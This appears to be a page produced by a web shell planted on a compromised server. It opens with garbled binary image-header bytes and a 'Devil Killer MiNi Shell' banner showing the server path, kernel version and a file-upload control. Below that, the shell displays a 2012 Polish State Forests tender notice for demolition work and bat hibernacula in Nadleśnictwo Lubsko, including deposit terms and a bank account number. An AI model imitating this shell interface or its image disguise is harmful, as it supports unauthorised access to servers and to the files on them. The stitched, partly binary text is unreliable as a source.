JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120531/182356-N-2012.html

<p class="kh_header"><b>Zielona Góra: Wykonanie rozbiórki i zabezpieczenie obiektów powojskowych,  porządkowanie terenu oraz działania ochrona i reintrodukcja gatunków zwierząt dla potrzeb nietoperzy w Nadleśnictwie Lubsko

Zamówienie realizowane będzie w ramach projektu Rekultywacja na cele przyrodnicze terenów zdegradowanych, popoligonowych i powojskowych zarządzanych przez PGL LP wpisanego na listę projektów indywidualnych dla Programu Operacyjnego Infrastruktura i Środowisko 2007-2013</b><br>
<b>Numer ogłoszenia: 182356 - 2012; data zamieszczenia: 31.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Regionalna Dyrekcja Lasów Państwowych , ul. Kazimierza Wielkiego 24a, 65-950 Zielona Góra, woj. lubuskie, tel. 068 3254451 w. 242, faks 068 3253630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_zielona_gora/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie rozbiórki i zabezpieczenie obiektów powojskowych,  porządkowanie terenu oraz działania ochrona i reintrodukcja gatunków zwierząt dla potrzeb nietoperzy w Nadleśnictwie Lubsko

Zamówienie realizowane będzie w ramach projektu Rekultywacja na cele przyrodnicze terenów zdegradowanych, popoligonowych i powojskowych zarządzanych przez PGL LP wpisanego na listę projektów indywidualnych dla Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
Wykonanie rozbiórki i zabezpieczenie obiektów powojskowych,  porządkowanie terenu oraz działania   ochrona i reintrodukcja gatunków zwierząt dla potrzeb nietoperzy w Nadleśnictwie Lubsko przewidzianych do realizacji na terenie po byłej fabryce materiałów chemicznych wykorzystywanych w przemyśle zbrojeniowym, znajdującym się w okolicach miejscowości Zasieki oraz Brożek, w gminie Brody, 
w powiecie żarskim, na terenie Nadleśnictwa Lubsko.
2. Zakres przedmiotowego zamówienia:
2.1. zadanie pn. rozbiórka lub zabezpieczenie obiektów powojskowych i porządkowanie terenu polegające ogólnie na rozbiórce lub zabezpieczeniu każdego obiektu stanowiącego zagrożenie dla otoczenia wymienionego w załączniku nr 1 do SIWZ; 
2.2. zadanie pn. ochrona i reintrodukcja gatunków roślin i zwierząt polegające w tym przypadku na przystosowaniu pomieszczenia podziemnego (piwnicy) w jednym obiekcie, pod hibernakula dla nietoperzy, tzn. zagruzowaniu okienek, zbiciu tynku oraz zamontowaniu drzwi wejściowych odpornych na wandalizm
2.3. Zakres terytorialny opracowania obejmuje teren leży zgłoszony do projektu przez Nadleśnictwo Lubsko, teren dz. nr 692, 693, 685, 696, 697, obręb Jeziory Wysokie, gmina Brody, powiat żarski, teren Nadleśnictwa Lubsko.

3.Ogólny opis zadania
Zadanie Rozbiórka lub zabezpieczenie obiektów powojskowych i porządkowanie terenu polega ogólnie na rozbiórce lub zabezpieczeniu każdego obiektu, wyszczególnionego w załączniku nr 1 do SIWZ stanowiącego zagrożenie dla otoczenia i znajdującego się na wyznaczonym przez Nadleśnictwo Lubsko terenie o łącznej pow. ok. 40 ha (teren bezpośredniej lokalizacji przedmiotowych obiektów wynosi ok. 30 ha). Pogarszający się stan techniczny obiektów, zaistniałe w przeszłości tragiczne wypadki oraz nieskutecznych dotychczasowych sposobów ich zabezpieczania, spowodowały podjęcie działań w kierunku skutecznego rozwiązania problemu.
Na przedmiotowym terenie w zakresie opracowania zinwentaryzowano łącznie 251  obiektów 
(w dokumentacji technicznej błędnie podano 250 obiektów, przy sporządzaniu oferty należy przyjąć ilość 251 obiektów) pofabrycznych stwarzających zagrożenie dla otoczenia lub utrudnienie dla rekultywacji terenu na cele przyrodnicze. Najczęściej są to odkryte studzienki kanalizacyjne oraz techniczne  (160 szt.). W pozostałych przypadkach są to ruiny i gruzowiska po różnych obiektach: budynkach, piwnicach, zbiornikach oraz instalacjach technicznych. Często występują zagruzowania, których funkcji pierwotnych trudno się domyślić. Jedynie 4 budynki posiadają pełne ściany parteru oraz zadaszenie. Są to obiekty przeznaczone do pozostawienia oraz zabezpieczenia polegającego na zamurowaniu możliwych wejść do przedmiotowych budynków..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.23.60.01-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
 180 000,00 PLN (słownie złotych: sto osiemdziesiąt tysięcy );
2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
2. 1	pieniądzu, przelewem na rachunek bankowy: w Banku BGŻ oZ.G. nr 42 2030 0045 1110 0000 0051 5680
2. 2	poręczeniach bankowych
2. 3	poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych
2. 4	gwarancjach bankowych
2. 5	gwarancjach ubezpieczeniowych
2. 6	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
3.	Wadium wnoszone w formie: poręczenia bankowego lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy załączyć w formie oryginału do oferty.
4.	Wadium wnoszone w postaci poręczeń i gwarancji bankowych, poręczeń kasy oszczędnościowo - kredytowej lub gwarancji ubezpieczeniowej należy załączyć do oferty w formie kopii dokumentu, 
a oryginał złożyć w oddzielnej kopercie oznaczonej oryginał wadium, która będzie załączona do oferty (wewnątrz opakowania oferty) i musi ono obejmować cały okres związania ofertą. 
W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp. 
5.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz
 z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a, 5 ustawy.
6.	Wniesienie wadium w pieniądzu będzie skuteczne, wyłącznie w chwili uznania tego rachunku bankowego przed terminem składania ofert tj. najpóźniej do dnia 20.06.2012 r., do godz. 9,00  gdyż dopiero uznanie tego rachunku bankowego kwotą wadium (wpływ środków pieniężnych z tytułu wadium na rachunek bankowy wskazany przez RDLP) powoduje, że RDLP będzie w posiadaniu wadium.
7.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt 2.1 rachunek bankowy najpóźniej przed upływem terminu składania ofert.
8.	RDLP dokona zwrotu wadium na zasadach określonych w art. 46 ust. 1-4 ustawy Pzp.
9.	Zgodnie z art. 46 ust. 4a i 5 ustawy Pzp RDLP zatrzyma wadium wraz z odsetkami, w przypadku, gdy:
9.1	 Wykonawca, którego oferta zostanie wybrana:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie;
b)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
9.2	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
10.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania (art.24, ust.2 pkt 2 ustawy), a jego oferta zostanie uznana za odrzuconą (art.24, ust.4 oraz art.89, ust.1 pkt 1 ustawy).
11.	RDLP zwraca wadium wszystkim Wykonawcą niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, któremu RDLP zwraca wadium niezwłocznie po zawarciu umowy.
12.	RDLP zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
13.	 RDLP żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art.46, ust.1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana, jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez RDLP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>RDLP nie precyzuje szczegółowych warunków dotyczących przedmiotowego warunku.


                 Ocena spełnienia warunku zostanie dokonana na podstawie załączonego dokumentu: 
                 Oświadczenia Wykonawcy, że spełnia wymagania art. 22 ust. 1pkt 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>RDLP uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał dwie rozbiórki budowlane lub rozbiórki budowlane 
 i zabezpieczenie obiektów budowlanych o wartości minimum  500 000,00 zł brutto za każde zadanie.

W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunku posiadania doświadczenia przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, RDLP  przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski bieżący kurs średni wymiany na dzień publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>RDLP nie precyzuje szczegółowych warunków dotyczących przedmiotowego
       warunku.
    Ocena spełnienia warunku zostanie dokonana na podstawie załączonego dokumentu: 
                 Oświadczenia Wykonawcy, że spełnia wymagania art. 22 ust. 1pkt 3 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>RDLP uzna warunek za spełniony, jeżeli Wykonawca wykaże dysponowanie, co najmniej jedną osobą posiadającą uprawnienia do pełnienia funkcji kierownika budowy (robót) 
w rozumieniu ustawy z 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U. z 2010r. Nr 243, poz.1623, z póź. zm.) w specjalności konstrukcyjno-budowlanej oraz doświadczeniu 
w kierowaniu robotami budowlanymi polegającymi na rozbiórce obiektów budowlanych lub rozbiórce i zabezpieczeniu obiektów budowlanych o wartości jednego zadania  - minimum  500 000,00 PLN brutto.
Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów Prawo budowlane  (tekst jednolity Dz.U. 
z 2010r. Nr 243, poz.1623, z póź. zm.) oraz ustawy o zasadach uznania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. 
U. z 2008 r., Nr 63, poz. 394), wówczas Wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym a Wykonawcą, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego. Wykonawca zatrudniając tłumacza winien wziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia tłumacz ten winien być biegłym w tłumaczeniu zagadnień technicznych, ekonomicznych
 i prawnych. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.

W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunku posiadania doświadczenia przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, RDLP przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski bieżący kurs średni wymiany na dzień publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>RDLP nie precyzuje szczegółowych warunków dotyczących przedmiotowego warunku.
                 Ocena spełnienia warunku zostanie dokonana na podstawie załączonego dokumentu: 
                 Oświadczenia Wykonawcy, że spełnia wymagania art. 22 ust. 1 pkt 4 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca, przed podpisaniem umowy, zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na kwotę stanowiącą 10 % zaoferowanej ceny brutto w jednej lub kilku następujących formach (do wyboru):
1. 1.	pieniądzu, przelewem na wskazany przez RDLP rachunek bankowy podany przez RDLP przed podpisaniem umowy,
1. 2.	 poręczeniach bankowych,
1. 3.	poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych,
1. 4.	gwarancjach bankowych,
1. 5.	gwarancjach ubezpieczeniowych,
1. 6.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz. U. z 2007r. Nr 42, poz. 275 ze zm.).
2. W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty
    wadium na poczet zabezpieczenia.


3. Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy wskazany   
    przez Zamawiającego, w trakcie realizacji umowy Wykonawca może dokonać zmiany formy
   zabezpieczenia na jedną lub kilka form zabezpieczenia, o których mowa w ust.1. pkt 1.1 - 1.6.
4. Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy
